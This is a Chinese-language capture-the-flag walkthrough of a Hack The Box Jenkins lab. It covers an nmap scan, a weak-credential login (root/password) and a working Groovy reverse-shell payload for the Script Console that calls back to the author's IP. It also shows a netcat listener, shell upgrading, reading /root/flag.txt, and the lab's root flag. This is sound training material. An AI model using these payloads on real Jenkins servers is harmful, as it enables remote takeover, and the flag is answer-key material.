目录
[1.What does the acronym CVE stand for?](#1.What does the acronym CVE stand for?)
[2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?](#2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?)
[3.What is the version of the service running on port 8080?](#3.What is the version of the service running on port 8080?)
[4.What version of Jenkins is running on the target?](#4.What version of Jenkins is running on the target?)
[5.What type of script is accepted as input on the Jenkins Script Console?](#5.What type of script is accepted as input on the Jenkins Script Console?)
[6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?](#6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?)
[7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?](#7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?)
[8.What switch should we use with netcat for it to use UDP transport mode?](#8.What switch should we use with netcat for it to use UDP transport mode?)
[9.What is the term used to describe making a target host initiate a connection back to the attacker host?](#9.What is the term used to describe making a target host initiate a connection back to the attacker host?)
ROOT_FLAG:9cdfb439c7876e703e307864c9167a15
连接至HTB服务器并启动靶机
靶机IP:10.129.235.133
分配IP:10.10.16.12
1.What does the acronym CVE stand for?
CVE 是 Common Vulnerabilities and Exposures(通用漏洞披露)的缩写。
CVE是一个公开的漏洞命名标准。它为已知的安全漏洞和暴露提供统一的标识符,方便安全研究人员、厂商和用户交流和跟踪安全问题,提升网络安全防护水平。
2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?
在网络安全中,CIA 三位一体指的是:Confidentiality, Integrity, Availability
保密性(Confidentiality )、完整性(Integrity )和可用性(Availability)
保密性确保信息仅被授权的用户访问;完整性保证信息在存储和传输过程中不被篡改;可用性确保授权用户能够随时可靠地访问信息和资源。
3.What is the version of the service running on port 8080?
使用nmap对靶机8080端口进行脚本、服务信息扫描:
nmap -sC -sV -p 8080 {TARGET_IP}
由nmap扫描结果可见,在VERSION 栏目下服务信息为:Jetty 9.4.39.v20210325
4.What version of Jenkins is running on the target?
使用浏览器对靶机URL进行访问:http://{TARGET_IP}:8080
自动跳转到了登录界面,直接弱口令爆破后获得账号密码:
账户:root
密码:password
进入后台面板后,在页面右下角可获得Jenkins版本信息:2.289.1
5.What type of script is accepted as input on the Jenkins Script Console?
点击左侧导航栏的:Manage Jenkins
在右侧往下拉,找到:Script Console
打开之后,查看有关脚本控制页面的描述:
Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the 'println' command to see the output (if you use System.out, it will go to the server's stdout, which is harder to see.) Example:
println(Jenkins.instance.pluginManager.plugins)
All the classes from all the plugins are visible. jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.
简单的机翻之后:
输入任意 Groovy 脚本并在服务器上执行它。这对于故障排除和诊断很有用。使用 "println" 命令查看输出(如果你使用 System.out,它将输出到服务器的标准输出,这更难看到)。示例:println(Jenkins.instance.pluginManager.plugins)
所有插件中的所有类都是可见的。jenkins.、jenkins.model.、hudson.* 和 hudson.model.* 已预先导入。
从描述中可以看到Jenkins脚本控制台接受Groovy脚本作为输入
6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?
在棱角社区可以找到各种类型的脚本Reverse_Shell:(附上链接)
String host="{NATIVE_IP}";
int port={NATIVE_PORT};
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);
try{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
如果靶机是Windows机器的话,String cmd 字段需要修改为:"cmd.exe"
7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?
这题就是常识题目:ifconfig ,在命令后加上**-a**参数是展示所有网络接口
ifconfig -a
可以看到我的tun0接口IP是:10.10.16.12
8.What switch should we use with netcat for it to use UDP transport mode?
查看netcat的使用选项:
nc -h
可以看到:-u 参数用于netcat使用UDP传输模式
9.What is the term used to describe making a target host initiate a connection back to the attacker host?
payload中的端口自己设定,所以我自己的完整payload:
String host="10.10.16.12";
int port=1425;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);
try{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
使用nc开启端口监听,在Script Console端运行脚本获得反弹shell(reverse shell):
利用script启动一个交互shell:
script /dev/null -c bash
最后在/root目录中找到了flag.txt,或者直接执行命令查看:
cat /root/flag.txt